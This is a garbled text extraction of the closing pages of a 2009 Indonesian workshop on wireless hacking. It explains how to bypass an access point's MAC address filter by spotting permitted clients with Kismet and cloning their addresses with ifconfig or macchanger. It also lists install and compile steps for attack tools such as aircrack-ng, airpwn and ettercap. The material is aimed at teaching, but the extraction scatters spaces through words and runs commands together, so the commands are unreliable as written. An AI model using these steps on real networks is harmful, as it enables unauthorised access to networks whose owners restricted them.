WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Melewati Pembatasan MAC Address
Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di
peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan
untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak
tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan
aparat penegak hukum.
Sebagian APakan memfilter MAC addressclient. Teknik menemukan MAC addressclient yang di
ijinkan lewat oleh APmenggunakan Kismetadalah
# ki smet
Lakukan
spaceS - unt uk men- sor tS - unt uk men- sor t t erhadap SSI DPanah Bawah - Let akan di SSI D AP yang ki t a i ngi nkan.ENTER - det ai l APC - l i hat si apa saj a cl i ent AP t er sebut
Pastikan airmon tidak aktif di WLANeth1
# ai r mon- ng st op eth1
Untuk mengubah MAC addressdari WLANdi eth1 menjadi sama dengan MAC addressclient yang
diijinkan AP
# i f conf i g eth1 down# i f conf i g et h1 hw et her 00: 16: CF: C1: FA: F5# i f conf i g et h1 up
Alternatif lain
# i f conf i g eth1 down# macchanger - mac 00: 16: CF: C1: FA: F5 et h1# i f conf i g et h1 up
atau untuk random MAC address
# macchanger - r et h1
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
27/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Aplikasi Yang Perlu DisiapkanBeberapa paket softwareyang dibutuhkan :
# apt - get i nst al l gcc g++ l i nux- ker nel - header s l i bpcap0. 8 l i bpcap0. 8- dev l i bnet 1l i bnet 1- dev l i bdnet \l i bdnet- dev subver si on python2. 4 python2. 4- dev python- pyx python- cr ypt o python-psyco dhcp3- ser ver bi nd9 apache2
Install beberapa aplikasi yang lebih fokus untuk hackingwireless
# apt - get i nst al l ki smet scapy macchanger et t er cap dsni f f ai r cr ack- ng
Pada Ubuntu9.04 aplikasi yang di instalasi adalah
# apt - get i nst al l ki smet python- scapy macchanger et t er cap dsni f f ai r cr ack-ng
Download source codeaplikasi berikut jika diperlukan
# cd / usr/ l ocal / src# svn co ht t ps: / / 802. 11ni nj a. net / svn/ l or con/ t r unk l or con# wget ht t p: / / downl oad. ai r crack- ng. or g/ ai r crack- ng- 0. 9. 3. t ar . gz# wget ht t p: / / s i d. rst ack. org/ code/ wi f i t ap/ wi f i t ap- 0. 4. 0. t gz
# wget ht t p: / / easynews. dl . sour cef or ge. net / sour cef or ge/ ai r pwn/ ai r pwn- 1. 30. t gzBagi pengguna Atheros& RT73 perlu mendownload
# wget ht t p: / / snapshot s. madwi f i . or g/ madwi f i - ng/ madwi f i - ng- r 2277- 20070414. t ar . gz# wget ht t p: / / homepages. t u- dar mst adt . de/ ~p_l ar bi g/ wl an/ r t 2570- k2wr l z- 1. 6. 1. t ar . bz2# wget ht t p: / / homepages. t u- dar mst adt . de/ ~p_l ar bi g/ wl an/ r t 73- k2wr l z- 1. 1. 0. t ar . bz2
Compile & Install Lorcon
# cd / usr/ l ocal / src/ l or con/# . / conf i gur e \- prefi x=/ usr \- sysconf di r =/ et c/ l or con \
- l ocal statedi r=/ var \- mandi r =/ usr / shar e/ man\- i nf odi r =/ usr/ share/ i nf o# make# make i nst al l
Sebaiknya di lakukan melalui airpwnseperti di bawah ini, Compile & Install Airpwn
# cd / usr/ l ocal / src/# t ar zxvf ai r pwn- 1. 3. t gz# cd / usr/ l ocal / src/ ai r pwn- 1. 3# t ar zxvf l or con- cur r ent . t gz# cp - Rf / usr/ l ocal / src/ l or con/ * / usr/ l ocal / src/ ai r pwn- 1. 3/ l or con# cd / usr/ l ocal / src/ ai r pwn- 1. 3/ l or con
# . / conf i gur e \- prefi x=/ usr \- sysconf di r =/ et c/ l or con \- l ocal statedi r=/ var \- mandi r =/ usr / shar e/ man\- i nf odi r =/ usr/ share/ i nf o# make# make i nst al l
Langkah selanjutnya kita perlu menginstall source codekernel:( ...
# cd / usr/ l ocal / src/ ai r pwn- 1. 3# . / conf i gur e# make
# make i nst al l
Install Wifitap& Airsnarf
# cd / usr/ l ocal / src/# t ar zxvf wi f i t ap- 0. 4. 0. t gz
https://802.11ninja.net/svn/lorcon/trunkhttp://download.aircrack-ng.org/aircrack-ng-0.9.3.tar.gzhttp://sid.rstack.org/code/wifitap/wifitap-0.4.0.tgzhttp://easynews.dl.sourceforge.net/sourceforge/airpwn/airpwn-1.30.tgzhttp://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r2277-20070414.tar.gzhttp://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-1.6.1.tar.bz2http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-1.1.0.tar.bz2http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-1.1.0.tar.bz2http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-1.6.1.tar.bz2http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r2277-20070414.tar.gzhttp://easynews.dl.sourceforge.net/sourceforge/airpwn/airpwn-1.30.tgzhttp://sid.rstack.org/code/wifitap/wifitap-0.4.0.tgzhttp://download.aircrack-ng.org/aircrack-ng-0.9.3.tar.gzhttps://802.11ninja.net/svn/lorcon/trunk -
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
28/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Instalasi Driver MadWiFi
Bagi anda yang menggunakan chipset Atherostampaknya perlu menginstalasi driver MadWiFi.
Instalasi kebutuhan untuk compile
# apt - get i nstal l bui l d- essent i al perl
Download source codemadwifidari
ht t p: / / at h5k. or g/ wi ki / MadWi f i ht t p: / / sour cef or ge. net / pr oj ect / showf i l es. php?gr oup_i d=82936
Copy dan buka source code
# cp madwi f i - 0. 9. 4. t ar . gz / usr/ l ocal / src/# cd / usr/ l ocal / src
# t ar zxvf madwi f i - 0. 9. 4. t ar . gz# cd / usr/ l ocal / src/ madwi f i - 0. 9. 4
Compile & Install MadWifiDriver
# make# make i nst al l
Load module
# modprobe at h_pci
Source :
http://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hacking
(CL) Onno W. Purbo
http://ath5k.org/wiki/MadWifihttp://sourceforge.net/project/showfiles.php?group_id=82936http://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hackinghttp://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hackinghttp://sourceforge.net/project/showfiles.php?group_id=82936http://ath5k.org/wiki/MadWifi